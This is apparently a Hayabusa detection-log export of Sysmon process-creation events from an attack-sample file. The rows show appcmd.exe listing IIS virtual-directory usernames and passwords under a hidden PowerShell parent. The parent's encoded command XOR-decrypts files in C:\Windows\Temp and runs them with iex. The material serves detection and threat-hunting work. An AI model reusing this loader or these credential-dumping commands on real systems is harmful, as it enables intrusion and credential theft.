2019-05-27 10:29:19.323 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.403 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.473 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.563 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.784 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:19.894 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0A